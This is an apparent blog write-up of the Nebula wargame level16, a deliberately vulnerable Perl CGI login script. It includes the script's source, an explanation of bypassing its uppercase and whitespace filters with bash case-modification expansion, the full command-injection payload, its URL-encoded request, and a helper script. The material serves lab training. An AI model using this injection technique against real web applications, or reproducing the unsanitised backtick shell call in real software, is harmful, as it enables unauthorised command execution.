Friday, November 2, 2012

exploit-exercises Nebula: level16

Another level in the Nebula wargame and another OS command injection vulnerability. The source code is provided:
#!/usr/bin/env perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub login {
    $username = $_[0];
    $password = $_[1];

    $username =~ tr/a-z/A-Z/; # convert to uppercase
    $username =~ s/\s.*//; # strip everything after a space

    # $username is interpolated straight into a shell command line: the injection point
    @output = `egrep "^$username" /home/flag16/userdb.txt 2>&1`;
    foreach $line (@output) {
        ($usr, $pw) = split(/:/, $line);

        # the password is used as a regular expression here, not compared literally
        if($pw =~ $password) {
            return 1;
        }
    }

    return 0;
}

sub htmlz {
    print("Login resuls");
    if($_[0] == 1) {
        print("Your login was accepted\n");
    } else {
        print("Your login failed\n");
    }
    print("Would you like a cookie?\n");
}

htmlz(login(param("username"), param("password")));
The username parameter is vulnerable to command injection, but there are two restrictions we have to bypass: the content of the parameter is converted to uppercase, and everything from the first whitespace character onwards is stripped. (The password check, $pw =~ $password, also treats the password as a regular expression rather than comparing it literally, but bypassing it only gets you an "accepted" message, not code execution; the username is the interesting parameter.)
$username =~ tr/a-z/A-Z/; # convert to uppercase
$username =~ s/\s.*//; # strip everything after a space
To bypass these restrictions we use bash's case-modification expansion. The payload first closes the double quote of the egrep pattern with a < redirection, leaving "^" as the pattern, then assigns the path of our script to the variable pwnvar and runs ${pwnvar,,}, which expands the variable with every character lowercased, so the path survives the tr/a-z/A-Z/ step (the variable name is uppercased too, but consistently on both sides, so that is harmless). The commands are separated with ; and contain no whitespace, otherwise s/\s.*// would truncate the payload, and a trailing # comments out the userdb path and the 2>&1 that follow. Our payload is "</dev/null;pwnvar=/tmp/pwn16;${pwnvar,,};# which, after the script's transformations, becomes the command line egrep "^"</DEV/NULL;PWNVAR=/TMP/PWN16;${PWNVAR,,};# /home/flag16/userdb.txt 2>&1
Two things to be aware of. First, the redirection target has been uppercased to /DEV/NULL, which does not exist, so the egrep command itself fails with a redirection error; a non-interactive shell without set -e simply carries on with the next command after the ;, which is what we care about. Second, ${var,,} is a bash 4 feature, so this only works if the /bin/sh that Perl spawns for the backticks is bash rather than dash. The script we point at must be readable and executable by the flag16 user:
level16@nebula:~$ cat /tmp/pwn16
#!/bin/sh
/bin/getflag > /tmp/pwnie16
URL-encode the payload: %22%3C%2Fdev%2Fnull%3Bpwnvar%3D%2Ftmp%2Fpwn16%3B%24%7Bpwnvar%2C%2C%7D%3B%23
and launch the exploit: http://192.168.56.101:1616/index.cgi?username=%22%3C%2Fdev%2Fnull%3Bpwnvar%3D%2Ftmp%2Fpwn16%3B%24%7Bpwnvar%2C%2C%7D%3B%23
level16@nebula:~$ cat /tmp/pwnie16
You have successfully executed getflag on a target account
